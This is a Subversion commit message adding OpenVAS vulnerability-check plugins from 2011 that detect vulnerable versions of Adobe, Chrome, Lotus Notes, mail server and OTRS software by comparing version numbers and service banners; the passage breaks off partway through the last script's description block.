[Openvas-commits] r10635 - in trunk/openvas-plugins: . scripts

[scm-commit@wald.intevation.org]

Author: chandra
Date: 2011-03-25 15:52:06 +0100 (Fri, 25 Mar 2011)
New Revision: 10635

Added:
   trunk/openvas-plugins/scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_kerio_products_starttls_cmd_inj_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_otrs_information_disclosure_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_phpbugtracker_multiple_xss.nasl
   trunk/openvas-plugins/scripts/secpod_smartermail_multiple_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_spoonftp_retr_cmd_dos_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_joomla_com_jimtawl_44992.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/ChangeLog	2011-03-25 14:52:06 UTC (rev 10635)
@@ -1,3 +1,21 @@
+2011-03-25  Chandrashekhar B <bchandra at secpod.com>
+
+	* scripts/secpod_ibm_lotus_notes_code_exec_vuln_win.nasl,
+	scripts/secpod_google_chrome_spdy_dos_vuln_win.nasl,
+	scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl,
+	scripts/secpod_smartermail_multiple_vuln.nasl,
+	scripts/secpod_phpbugtracker_multiple_xss.nasl,
+	scripts/secpod_kerio_products_starttls_cmd_inj_vuln.nasl,
+	scripts/secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl,
+	scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl,
+	scripts/secpod_spoonftp_retr_cmd_dos_vuln.nasl,
+	scripts/secpod_otrs_information_disclosure_vuln.nasl,
+	scripts/secpod_google_chrome_spdy_dos_vuln_lin.nasl:
+	Added new plugins.
+
+	* scripts/gb_joomla_com_jimtawl_44992.nasl:
+	Added CVE.
+
 2011-03-25 Veerendra G.G <veerendragg at secpod.com>
 
 	* scripts/gb_fedora_2011_3946_xulrunner_fc14.nasl,

Modified: trunk/openvas-plugins/scripts/gb_joomla_com_jimtawl_44992.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_com_jimtawl_44992.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/gb_joomla_com_jimtawl_44992.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -27,6 +27,7 @@
 if (description)
 {
  script_id(100919);
+ script_cve_id("CVE-2010-4769");
  script_bugtraq_id(44992);
  script_version ("1.0-$Revision$");
 

Added: trunk/openvas-plugins/scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_flash_player_mem_crptn_vuln_lin_.nasl 14349 2011-03-24 12:12:12 mar $
+#
+# Adobe Flash Player Remote Memory Corruption Vulnerability (Linux)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902401);
+  script_version("$Revision: 1.0$");
+  script_cve_id("CVE-2011-0609");
+  script_bugtraq_id(46860);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("Adobe Flash Player Remote Memory Corruption Vulnerability (Linux)");
+  desc = "
+  Overview: This host is installed with Adobe Flash Player and is prone to
+  memory corruption vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when handling the 'SWF' file, which allows
+  attackers to execute arbitrary code or cause a denial of service via crafted
+  flash content.
+
+  Impact:
+  Successful exploitation will let attackers to execute arbitrary code or cause
+  a denial of service.
+
+  Impact Level: Application/System
+
+  Affected Software/OS:
+  Adobe Flash Player version 10.2.152.33 and prior on Linux.
+
+  Fix: Upgrade to Adobe Flash Player version 10.2.153.1 or later.
+  For details refer, http://www.adobe.com/downloads/
+
+  References:
+  http://www.adobe.com/support/security/bulletins/apsb11-06.html
+  http://www.adobe.com/support/security/advisories/apsa11-01.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Adobe Flash Player");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
+  script_require_keys("AdobeFlashPlayer/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+flashVer = get_kb_item("AdobeFlashPlayer/Linux/Ver");
+if(!flashVer){
+  exit(0);
+}
+
+flashVer = ereg_replace(pattern:",", string:flashVer, replace: ".");
+
+## Check for Adobe Flash Player versions 10.2.152.33 and prior.
+if(version_is_less_equal(version:flashVer, test_version:"10.2.152.33")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_flash_player_mem_crptn_vuln_lin.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_adobe_prdts_mem_crptn_vuln_win.nasl 14349 2011-03-24 10:25:26Z mar $
+#
+# Adobe Products Remote Memory Corruption Vulnerability (Windows)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902400);
+  script_version("$Revision: 1.0$");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_cve_id("CVE-2011-0609");
+  script_bugtraq_id(46860);
+  script_name("Adobe Products Remote Memory Corruption Vulnerability (Windows)");
+  desc = "
+  Overview: This host has Adobe Acrobat or Adobe Reader or Adobe flash Player
+  installed, and is prone to memory corruption vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to an error in handling 'SWF' file in adobe flash
+  player and 'Authplay.dll' in Adobe acrobat/reader. which allows attackers to
+  execute arbitrary code or cause a denial of service via crafted flash
+  content.
+
+  Impact:
+  Successful exploitation will let attackers to corrupt memory and execute
+  arbitrary code on the system with elevated privileges.
+
+  Impact Level: Application/System
+
+  Affected Software/OS:
+  Adobe Flash Player version 10.2.152.33 and prior on Windows
+  Adobe Reader/Acrobat version 9.x to 9.4.2 and 10.x to 10.0.1 on Windows.
+
+  Fix: Upgrade to Adobe Flash Player to 10.2.153.1 or later and upgrade Adobe
+  Reader/Acrobat to 10.0.2
+  For details refer, http://www.adobe.com/
+
+  References:
+  http://www.adobe.com/support/security/bulletins/apsb11-06.html
+  http://www.adobe.com/support/security/advisories/apsa11-01.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Adobe Acrobat, Reader and Adobe Flash Player");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_adobe_prdts_detect_win.nasl", "gb_adobe_flash_player_detect_win.nasl");
+  script_require_keys("Adobe/Reader/Win/Ver", "Adobe/Acrobat/Win/Ver",
+                      "AdobeFlashPlayer/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+# Check for Adobe Reader
+readerVer = get_kb_item("Adobe/Reader/Win/Ver");
+if(readerVer)
+{
+  if(version_in_range(version:readerVer, test_version:"9.0", test_version2:"9.4.2") ||
+     version_in_range(version:readerVer, test_version:"10.0", test_version2:"10.0.1"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for Adobe Acrobat
+acrobatVer = get_kb_item("Adobe/Acrobat/Win/Ver");
+if(acrobatVer)
+{
+  if(version_in_range(version:acrobatVer, test_version:"9.0", test_version2:"9.4.2") ||
+     version_in_range(version:acrobatVer, test_version:"10.0", test_version2:"10.0.1"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for Adobe Flash Player version <= 10.2.152.33
+flashVer = get_kb_item("AdobeFlashPlayer/Win/Ver");
+if(flashVer)
+{
+  if(version_is_less_equal(version:flashVer, test_version:"10.2.152.33")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_adobe_prdts_mem_crptn_vuln_win.nasl
___________________________________________________________________
Name: svn:executable
   + *

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_lin.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_lin.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_spdy_dos_vuln_lin.nasl 14435 2011-03-22 11:15:29Z mar $
+#
+# Google Chrome 'SPDY' Denial of Service vulnerability (Linux)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902358);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2011-1465");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Google Chrome 'SPDY' Denial Of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with Google Chrome and is prone to Denial
+  Of Service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'SPDY' implementation in
+  'net/http/http_network_transaction.cc', which drains the bodies from SPDY
+  responses.
+
+  Impact:
+  Successful exploitation will allow remote attackers to cause a denial of
+  service by using SPDY servers.
+
+  Impact Level: Apllication
+
+  Affected Software/OS:
+  Google Chrome version prior to 11.0.696.14
+
+  Fix: Upgrade to Google Chrome version 11.0.696.14 or later
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://code.google.com/p/chromium/issues/detail?id=75657
+  http://googlechromereleases.blogspot.com/2011/03/dev-channel-update_17.html
+  http://src.chromium.org/viewvc/chrome/trunk/src/net/http/http_network_transaction.cc?r1=77893&r2=77892&pathrev=77893 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_google_chrome_detect_lin.nasl");
+  script_require_keys("Google-Chrome/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+# Check for Google Chrome version < 11.0.696.14
+if(version_is_less(version:chromeVer, test_version:"11.0.696.14")){
+  security_warning(0);
+}

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_win.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_spdy_dos_vuln_win.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,82 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_spdy_dos_vuln_win.nasl 14435 2011-03-22 10:55:29Z mar $
+#
+# Google Chrome 'SPDY' Denial of Service vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902357);
+  script_version("$Revision$: 1.0");
+  script_cve_id("CVE-2011-1465");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_name("Google Chrome 'SPDY' Denial Of Service Vulnerability");
+  desc = "
+  Overview: This host is installed with Google Chrome and is prone to Denial
+  Of Service vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to error in 'SPDY' implementation in
+  'net/http/http_network_transaction.cc', which drains the bodies from SPDY
+  responses.
+
+  Impact:
+  Successful exploitation will allow remote attackers to cause a denial of
+  service by using SPDY servers.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 11.0.696.14
+
+  Fix: Upgrade to Google Chrome version 11.0.696.14 or later
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://code.google.com/p/chromium/issues/detail?id=75657
+  http://googlechromereleases.blogspot.com/2011/03/dev-channel-update_17.html
+  http://src.chromium.org/viewvc/chrome/trunk/src/net/http/http_network_transaction.cc?r1=77893&r2=77892&pathrev=77893 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_google_chrome_detect_win.nasl");
+  script_require_keys("GoogleChrome/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+# Check for Google Chrome version < 11.0.696.14
+if(version_is_less(version:chromeVer, test_version:"11.0.696.14")){
+  security_warning(0);
+}

Added: trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_code_exec_vuln_win.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_ibm_lotus_notes_code_exec_vuln_win.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,99 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ibm_lotus_notes_code_exec_vuln_win.nasl 13685 2011-03-22 11:24:24Z mar $
+#
+# IBM Lotus Notes 'cai' URI and iCal Remote Code Execution Vulnerabilities (Win)
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod  http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902298);
+  script_version("$Revision:1.0 $");
+  script_cve_id("CVE-2011-0912");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_name("IBM Lotus Notes 'cai' URI and iCal Remote Code Execution Vulnerabilities (Win)");
+  desc = "
+  Overview: This host has IBM Lotus Notes installed and is prone to remote code
+  execution vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws  are caused due to:
+  - An input validation error when processing the '--launcher.library' switch
+    within a 'cai:' URI, which could allow attackers to load a malicious
+    library.
+  - A buffer overflow error related to 'iCal', which could be exploited by
+    attackers to execute arbitrary code.
+
+  Impact:
+  Successful exploitation will let the attackers to execute arbitrary code in the
+  context of the user running the application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  IBM Lotus Notes Version 8.0.x before 8.0.2 FP6 and 8.5.x before 8.5.1 FP5 on windows
+
+  Fix: Upgrade to IBM Lotus Notes 8.0.2 FP6 or 8.5.1 FP5
+  For updates refer, http://www.ibm.com/software/lotus/products/notes/
+
+  References:
+  http://secunia.com/advisories/43222
+  http://www.vupen.com/english/advisories/2011/0295
+  https://www-304.ibm.com/support/docview.wss?uid=swg21461514 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM Lotus Notes");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_ibm_lotus_notes_detect_win.nasl");
+  script_require_keys("IBM/LotusNotes/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get for IBM Lotus Notes Version
+lotusVer = get_kb_item("IBM/LotusNotes/Win/Ver");
+if(!lotusVer){
+  exit(0);
+}
+
+## Check for IBM Lotus Notes Version 8.0.x before 8.0.2 FP6
+if(lotusVer =~ "8.0")
+{
+  if(version_is_less(version:lotusVer, test_version:"8.0.2.6"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+## Check for IBM Lotus Notes Version 8.5.x before 8.5.1 FP5
+if(lotusVer =~ "8.5")
+{
+  if(version_is_less(version:lotusVer, test_version:"8.5.1.5")){
+    security_hole(0);
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,133 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ipswitch_imail_server_starttls_cmd_inj_vuln.nasl 14383 2011-03-24 15:15:15Z mar $
+#
+# Ipswitch IMail Server STARTTLS Plaintext Command Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(901195);
+  script_version("$Revision: 1.0 $");
+  script_cve_id("CVE-2011-1430");
+  script_bugtraq_id(46767);
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Ipswitch IMail Server STARTTLS Plaintext Command Injection Vulnerability");
+  desc = "
+  Overview: The host is running Ipswitch IMail Server and is prone to
+  plaintext command injection vulnerability.
+
+  Vulnerability Insight:
+  This flaw is caused by an error within the 'STARTTLS' implementation where
+  the switch from plaintext to TLS is implemented below the application's I/O
+  buffering layer, which could allow attackers to inject commands during the
+  plaintext phase of the protocol via man-in-the-middle attacks.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary commands
+  in the context of the user running the application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Ipswitch IMail versions 11.03 and Prior.
+
+  Fix: No solution/patch is available as on 24th March, 2011. Information
+  regarding this issue will updated once the solution details are available.
+  For updates refer, http://www.imailserver.com/
+
+  References:
+  http://secunia.com/advisories/43676
+  http://www.vupen.com/english/advisories/2011/060 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Ipswitch IMail Server");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("find_service.nes", "smtpserver_detect.nasl");
+  script_require_ports("Services/smtp","Services/pop3","Services/imap",25, 110, 143);
+  exit(0);
+}
+
+
+include("smtp_func.inc");
+include("pop3_func.inc");
+include("imap_func.inc");
+include("version_func.inc");
+
+## Check Vulnerable IMail Server Versions.
+function check_vuln(banner,port)
+{
+  version = eregmatch(pattern: "IMail ([0-9.]+)", string: banner);
+  if(!isnull(version[1]))
+  {
+    if(version_is_less_equal(version: version[1], test_version:"11.03"))
+    {
+      security_hole(port:port);
+      exit(0);
+    }
+  }
+}
+
+## Get SMTP Port
+port = get_kb_item("Services/smtp");
+if(!port) {
+  port = 25;
+}
+
+## Get SMTP Banner
+if(banner = get_smtp_banner(port:port))
+{
+  if("IMail" >< banner) {
+    check_vuln(banner:banner,port:port);
+  }
+}
+
+## Check POP3 Port
+port = get_kb_item("Services/pop3");
+if(!port) {
+  port = 110;
+}
+
+## Get POP3 Baner
+if(banner = get_pop3_banner(port:port))
+{
+  if("IMail" >< banner) {
+    check_vuln(banner:banner,port:port);
+  }
+}
+
+## Check IMAP Port
+port = get_kb_item("Services/imap");
+if(!port) {
+  port = 143;
+}
+
+## Get IMAP Banner
+if(banner = get_imap_banner(port:port))
+{
+  if("IMail" >< banner) {
+    check_vuln(banner:banner,port:port);
+  }
+}

Added: trunk/openvas-plugins/scripts/secpod_kerio_products_starttls_cmd_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_kerio_products_starttls_cmd_inj_vuln.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_kerio_products_starttls_cmd_inj_vuln.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_kerio_products_starttls_cmd_inj_vuln.nasl 14480 2011-03-24 15:15:15Z mar $
+#
+# Kerio Products 'STARTTLS' Plaintext Command Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(901194);
+  script_version("$Revision: 1.0 $");
+  script_cve_id("CVE-2011-1506");
+  script_bugtraq_id(46767);
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_name("Kerio Products 'STARTTLS' Plaintext Command Injection Vulnerability");
+  desc = "
+  Overview: The host is running Kerio Mail Server/Connect and is prone to
+  plaintext command injection vulnerability.
+
+  Vulnerability Insight:
+  This flaw is caused by an error within the 'STARTTLS' implementation where
+  the switch from plaintext to TLS is implemented below the application's I/O
+  buffering layer, which could allow attackers to inject commands during the
+  plaintext phase of the protocol via man-in-the-middle attacks.
+
+  Impact:
+  Successful exploitation will let the attacker to execute arbitrary commands
+  in the context of the user running the application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Kerio MailServer versions 6.x
+  Kerio Connect version 7.1.4 build 2985
+
+  Fix: No solution/patch is available as on 23rd March, 2011. Information
+  regarding this issue will updated once the solution details are available.
+  For updates refer, http://www.kerio.com/connect/download
+
+  References:
+  http://secunia.com/advisories/43678
+  http://www.vupen.com/english/advisories/2011/0610 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Kerio Mail Server/Connect");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("gb_kerio_mailserver_detect.nasl");
+  script_require_keys("KerioMailServer/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get Kerio Mail Server/Connect Version.
+kerioVer = get_kb_item("KerioMailServer/Ver");
+if(!kerioVer){
+  exit(0);
+}
+
+## Chek for the Kerio Mail Server/Connect Versions
+if(version_in_range(version:kerioVer, test_version:"6.0", test_version2:"6.7.3.patch1") ||
+   version_is_equal(version:kerioVer, test_version:"7.1.4")){
+  security_hole(0);
+}

Added: trunk/openvas-plugins/scripts/secpod_otrs_information_disclosure_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_otrs_information_disclosure_vuln.nasl	2011-03-25 14:26:27 UTC (rev 10634)
+++ trunk/openvas-plugins/scripts/secpod_otrs_information_disclosure_vuln.nasl	2011-03-25 14:52:06 UTC (rev 10635)
@@ -0,0 +1,90 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_otrs_information_disclosure_vuln.nasl 14436 2011-03-23 13:30:29 mar $
+#
+# Open Ticket Request System (OTRS) Information Disclosure Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+################################i###############################################
+
+if(description)
+{
+  script_id(902361);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_cve_id("CVE-2011-1433");
+  script_name("Open Ticket Request System (OTRS) Information Disclosure Vulnerability");
+  desc = "
+  Overview: This host is running Open Ticket Request System (OTRS) and is prone
+  to information disclosure vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the error in 'AgentInterface' and 'CustomerInterface'
+  components, which place cleartext credentials into the session data in the
+  database.
+
+  Impact:
+  Successful exploitation will allow attackers to obtain sensitive information
+  by reading the _UserLogin and _UserPW fields.
+
+  Impact Level: Application.
+
+  Affected Software:
+  Open Ticket Request System (OTRS) version prior to 3.0.6
+
+  Fix: Upgarde to Open Ticket Request System (OTRS) version 3.0.6 or later
+  For updates refer, http://otrs.org/download/
+
+  References:
+  http://bugs.otrs.org/show_bug.cgi?id=6878
+  http://source.otrs.org/viewvc.cgi/otrs/CHANGES?revision=1.1807 ";
+
+  script_description(desc);
+  script_summary("Check for the version of Open Ticket Request System (OTRS)");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("secpod_otrs_detect.nasl");
